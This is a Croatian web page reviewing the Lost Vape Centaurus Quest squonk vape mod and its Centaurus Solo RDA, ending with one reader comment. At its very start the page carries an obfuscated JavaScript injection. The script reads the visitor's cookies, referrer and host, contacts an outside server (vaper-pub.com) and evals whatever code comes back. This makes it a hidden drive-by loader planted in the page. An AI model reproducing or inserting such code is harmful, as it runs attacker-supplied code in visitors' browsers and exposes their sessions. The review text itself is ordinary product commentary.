;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Review: Centaurus Quest Squonk Mod – Lost Vape

Prošlo je neko vrijeme otkad pričali o squonk modovima. Čini se da tvrtke više favoriziraju POD uređaje i jednokratne uređaje ovih dana nego bilo što drugo, ali to ne znači da su upravo ovo najbolji uređaji na tržištu.

Centaurus Quest Squonk kit sadrži inovativnu i uklonjivu squonk bocu od 9,5 ml, a također dolazi s bocom za “skladištenje” ako ga želite koristiti kao obični mod. Daje snagu do 100 W i koristi jednu bateriju 21700, 20700 ili 18650. Može se puniti putem Type-C punjenja.

Komplet dolazi sa Centaurus Solo RDA.

Lost Vape radi odlične uređaje, bez obzira koriste li DNA čip ili svoj vlastiti Quest čip. Neki od njihovih nedavnih noviteta su i Ursa Nano pod, Thelema Quest mod i Cyborg Quest mod. Svaki od njih dobio je relativno visoke ocjene, ali može li Centaurus Quest zadržati trend?

Osnovne značajke

 • Konstrukcija od legure cinka
 • Veličina: 86 mm x 52,75 mm x 31,90 mm
 • Koristi jednu bateriju 21700/20700/18650
 • 0,96” zaslon u boji
 • 8V Maksimalni izlazni napon
 • 100W maksimalna snaga
 • Načini rada Power, TC, Bypass, Voltage, Custom Curves
 • Kapacitet squonk boce od 9,5 ml

Dizajn i kvaliteta izrade

Centaurus Quest BF mod ima pomalo nekonvencionalan dizajn, čak i za squonk mod. Većina squonk modova koje smo koristili u prošlosti imali su zaslon na prednjoj strani uređaja gdje je tipka za paljenje, a squonk bocu sa strane ili straga. Ovaj mod je upravo suprotan – squonk boca se nalazi odmah ispod tipke za paljenje, a zaslon i tipke su sa strane. Čudan je to izgled, pogotovo zato što se zaslon i tipke nalaze na ploči koja je podignuta od moda za dosta milimetara.

Ako zanemarite tu stranu Centaurus Quest BF-a i pogledate je iz bilo kojeg drugog kuta, izgleda kao prilično lijep i normalan squonk mod. Ima izrazito “Lost Vape” dizajn koji podsjeća na njihove druge modove.

Ovaj mod je izrađen od legure cinka i dolazi u 6 različitih dizajna rukohvata: 3 su šarena i apstraktna, druga 3 su neutralnija. Boja okvira bit će crna, metalna ili srebrna, ovisno o dizajnu rukohvata koji odaberete. Sve boje dolaze s pločom u stilu karbonskih vlakana.

Što se kvalitete izrade tiče, ovo je ipak Lost Vape uređaj pa je iako je iz njihove Quest linije još uvijek vrlo dobro napravljen. Završna obrada svih dijelova je izvrsna i nema zveckanja ili pomicanja bilo kojeg dijela. Malo je težak za mod s jednom baterijom, čak i s konstrukcijom od legure cinka, a smatram da je po veličini i težini usporediviji s dvostrukim 18650 baterijskim modom.

Vrata baterije su poklopac s navojem koji se odvrće kako bi vam omogućio pristup pretincu za baterije. Navoj je gladak i vrlo dobro obrađen. Ovaj mod koristi jednu bateriju 21700, 20700 ili 18650 (koristeći priloženi adapter). Poklopac baterije ima šarku koja iskače kako bi njegovo uklanjanje ili zamjena bilo lako. Tu su i rupe za odzračivanje na čepu radi sigurnosti koje volim vidjeti.

Pretinac za baterije je čvrst, ali ne previše čvrst, a unutar njega se nalazi pozitivni terminal s oprugom. Čuje se malo zveckanje baterije ako koristite bateriju 18650 s adapterom ili bateriju 20700, ali gotovo ništa s baterijom 21700.

Squonk boca

Sama boca je integrirana u plastični okvir koji klizi na dno uređaja. Ovaj sustav „tračnica“ osigurava savršeno, čvrsto brtvljenje i prianjanje. Boca ima izvanrednih 9,5 ml kapaciteta.

Na dnu boce nalazi se mali okrugli čep s navojem, sličan vratima baterije. Ovaj čep možete ukloniti dok je boca još umetnuta u mod, ali meni je lakše ukloniti ga i zatim napuniti. Nakon što se izvadi, boca se sama zatvara tako da nema šanse da curi kada se okrene naopako.

Također možete odvojiti gornji čep boce i od tamo je ponovno napuniti, ali to može biti neuredno jer unutarnja cijev boce izlazi s čepom. Gornji poklopac koji se može ukloniti više je namijenjen za čišćenje boce, a ne za ponovno punjenje.

Uz squonk bocu, dobivate i „bocu za skladištenje“ od 9,5 ml koju koristite kako bi pretvorili Centaurus Quest u običan mod, odnosno u mod koji nije squonk.

Ovu bočicu možete napuniti svojom omiljenom e-tekućinom i koristiti je kako bi dopunili bilo koji atomizer kada se isprazni. Zahvaljujući ovome, ne morate sa sobom nositi rezervnu bočicu tekućine, već vam je rezerva pohranjena u samom modu. A budući da sadrži 9,5 ml e-tekućine, mnogim vaperima je to više nego dovoljno da izguraju dan.

Centaurus Solo RDA

Centaurus Solo RDA i ima jednu zavojnicu s kojom dolazi te dual post build deck. Izrađen je od nehrđajućeg čelika i ima promjer baze 24 mm. Dizajn je elegantan i izgleda vrlo dobro. Boja odgovara boji na Centaurus Quest modu.

Centaurus Solo dolazi s drip tipom srednjeg promjera 810, ali u paketu je uključen i širi drip-tip koji možete zamijeniti.

Ovaj RDA se sastoji od 4 dijela: drip tipa, gornjeg poklopca, poklopca tijela i baze. Gornji poklopac služi kao kontrola protoka zraka za dva otvora za protok zraka i može se rotirati za otvaranje ili zatvaranje. Dizajn protoka zraka je zanimljiv jer se prorezi za spajaju na bazu i stvaraju tunel iz utora za protok zraka izravno do dna zavojnica. S potpuno otvorenim protokom, gornji poklopac brtvi vrh ovog tunela i dopušta samo usmjeravanje zraka ispod zavojnica.

Ako je protok zraka postavljen bilo kako osim potpuno otvorenog, to će omogućiti zraku da izađe iz vrha tunela i na taj će način smanjiti okus. Moj prijedlog je da ostavite protok zraka otvoren do kraja za najbolje rezultate.

Build deck je jednostavan s dva stupa za jednu zavojnicu. Postoje gornje montirani vijci s ravnom glavom koji se jednostavno odvrću. Zatim umetnite noge zavojnice i zategnite ove vijke prema dolje. Zatim možete kroz zavojnice provući vatu tako da je ugurate u kanale na stranama baze i gotovi ste. Sve u svemu, vrlo jednostavno postolje za izradu grijača.

Squonk pin dolazi unaprijed instaliran na ovom atomizeru, ali možete ga zamijeniti za običan ako želite ovaj atomizer koristiti kao klasični dripper.

Performanse

Počet ću s onim što svi želite znati: koliko je dobar ovaj mod kada je u pitanju sqonking? Pa, to je definitivno jedan od najboljih modova koje trenutno možete nabaviti za tu svrhu po ovoj cijeni. Svakodnevno korištenje ovog moda u biti je bez nereda. Skinem bocu, okrenem je naopako, skinem čep i napunim.

Sve što je potrebno je čvrsti pritisak na bočicu kako kako bi natopili svoj RDA. Prekomjerno natapanje nije problem sa Solo RDA jer se višak e-tekućine usisava natrag u bocu.

Naš test je bio na 0,20Ω na Solo RDA te na 80W sa širom otvorenim protokom zraka. Okus je dobar, ali nije dovoljno dobar da bi zbog njega odustali od ostalih RDA. Ali za prvi pokušaj RDA Lost Vape su dobro prošli s performansama koje pruža.

Natrag na mod. Ukupne performanse i TC performanse su dobre za mod koji nije DNA. Još uvijek nije jednako dobar, ali ne bi DNA bio DNA da ga je baš toliko lako kopirati. Ipak, za nekoga tko želi isprobati TC, Quest čipset će vam omogućiti da ga iskusite po pristupačnijoj cijeni.

Tags:
Choose your Reaction!
 • Velika želja mi je isprobati squonk način parenja, nažalost nemam nikoga u okruženju tko ima nekakav squonk setup.
  Malo mi je preskupa investicija u setup samo da bih probao. Ali, vjerujem da bih se brzo navukao na squonkanje,
  jednom kad bih isprobao ;)

Leave a Comment